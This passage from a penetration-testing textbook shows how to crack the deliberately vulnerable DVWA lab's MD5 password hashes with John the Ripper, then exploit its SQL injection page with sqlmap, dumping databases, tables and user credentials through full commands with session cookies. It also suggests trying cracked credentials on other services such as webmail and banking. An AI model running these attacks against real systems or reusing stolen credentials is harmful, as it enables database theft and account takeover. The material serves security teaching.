I n a new terminal, browse to the John directory by executing the cd /pentest/passwords/john command. To execute the password cracker on the input file we’ve created, execute the following command.
./john --format=raw-MD5 dvwa_pw.txt --show
The --format flag specifies what type of password hashes are in the input file and the -- show flag will display the usernames and passwords that have been reliably cracked. The output from this command is displayed below in the same username:password format that we used in the input file. As expected, all five passwords were successfully cracked.
admin:password gordonb:abc123
1337:charley pablo:letmein smithy:password
With these credentials, you can now log into D VWA as any of these users. Go ahead and try it! The currently logged in user to D VWA is displayed in the lower left corner of the screen when you successfully login. A nother potential use of these newly discovered credentials is that you can now use these usernames and passwords in other places. For example, it is common for a user to have the same username and password for a web application that they use for webmail, online banking, and social networking. I t’s always a good idea to try these credentials to a empt to authenticate to any service that you find running.
sqlmap
A really useful S Q L injection command line tool is sqlmap, which was created by Bernardo D amele and Miroslav S tampar and can be downloaded from http://sqlmap.org. I t is also included in the default install of BackTrack under the /pentest/database/sqlmap
directory. sqlmap automates the process of detecting and exploiting S Q L injection flaws and has an onboard detection engine and a tons of options that allow a wide range of attacks to be executed against the web application.
You can actually complete all of the S Q L injection a acks that we completed in the section above by using sqlmap and its available flags; some of the most useful flags include:
■-u to specify the target URL of the vulnerable page.
■--cookie to specify a valid session cookie to be passed to the application during the attack.
■-b to retrieve the database’s banner.
■--current-db to retrieve the Database Management System’s (DBMS) current database.
■--current-user to retrieve DBMS current user.
■--string to provide a string value that is always present to help identify false positives.
■--users to retrieve the database management system users.
■--password to retrieve the database management password hashes for system users.
■-U to specify which database management user to include in the attack.
■--privileges to retrieve the selected user’s privileges.
■--dbs to retrieve the names of all databases on the database server.
■-D to specify which database to target.
■--tables to retrieve all tables in the targeted database.
■-T to specify which table to target.
■--columns to retrieve all columns in the targeted table.
■-C to specify which columns to be retrieved.
■--dump to retrieve the contents of the targeted columns.
The two parameter values that we need in addition to using these flags are the exact URL of the vulnerable page and a valid session identifier (cookie) value. We can easily retrieve those values from the raw tab in Burp I ntercept. While the URL will be the same
for each user, the session identifier that you use will be different, so please note your exact values. Ensure your proxy is configured to capture requests and browse back to the
SQ L I njection page on D VWA . A fter you enter any value (2 in our example) for the User I D , the required values that we need to run sqlmap will be displayed in the raw tab as shown in Figure 4.9.
FIGURE 4.9 Raw request of SQL injectable page in DVWA.
There are two parameters in the Cookie header (PHPSESSID and security), and we will need to use both values in sqlmap. We also need to harvest the URL from the Referrer
header. To ensure you don’t lose track of these values, open a new gedit file to copy and paste these values as we will be using the cookie values with the --cookie flag and the URL value with the -u flag in sqlmap. To open sqlmap, navigate to the appropriate directory by executing the cd /pentest/database/sqlmap command.
You can run sqlmap against our vulnerable page by executing the following command to retrieve the name of the database. S elect y when you are prompted for additional testing.
./sqlmap.py -u "http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=10tlrk8vql4s8kkqacneo55fq7; security=low" -b -- current-db
The results, as expected, mirror what we found when we executed the S Q L injections earlier as shown in Figure 4.10. When prompted to find more additional parameters, make sure to select no.
FIGURE 4.10 sqlmap results for database banner and database name.
To retrieve all tables in the dvwa database, as shown in Figure 4.11, run the following command.
FIGURE 4.11 sqlmap results for tables in the “dvwa” database.
./sqlmap.py -u "http://127.0.0.1/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="PHPSESSID=10tlrk8vql4s8kkqacneo55fq7; security=low" -D dvwa -tables
To retrieve the columns from the users table in the dvwa database, as shown in Figure 4.12, run the following command.
FIGURE 4.12 sqlmap results for columns in the “users” table in the “dvwa” database.
./sqlmap.py -u "http://127.0.0.1/vulnerabilities/sqli/?id=2&Submit=Submit"
--cookie="PHPSESSID=10tlrk8vql4s8kkqacneo55fq7; security=low" -D dvwa -T users --columns
To retrieve all of the database users and cracked passwords, as shown in Figure 4.13, run the following command.
FIGURE 4.13 sqlmap results for password cracking for all usernames in the “dvwa” database.
./sqlmap.py -u "http://127.0.0.1/vulnerabilities/sqli/?id=2&Submit=Submit"
--cookie="PHPSESSID=10tlrk8vql4s8kkqacneo55fq7; security=low" -D dvwa -T users -C password,users,user_id --dump
A le rt
When prompted with do you want sqlmap to consider provided column(s):, select 2 so you get exact column names and accept the default dictionary to use for the attack.
The same exploit that took two different tools and six commands took just four commands in sqlmap. You can actually combine all the sqlmap flags into one command and do all this work at once!
./sqlmap.py -u "http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit"
--cookie="PHPSESSID=10tlrk8vql4s8kkqacneo55fq7; security=low" -b -- current-db -D dvwa --tables -T users --columns -C user,password -- dump
The three approaches just introduced to exploit S Q L injection vulnerabilities will serve you very well in the future as you discover, and want to exploit, S Q L injection vulnerabilities.
1. Using verbose error messages to derive malicious input to be entered directly into the web application’s HTML form.
2. Using an intercepting proxy to edit the value of parameters being passed to the SQL interpreter.
3. Using an automated exploitation tool, such as sqlmap, to conduct SQL exploits.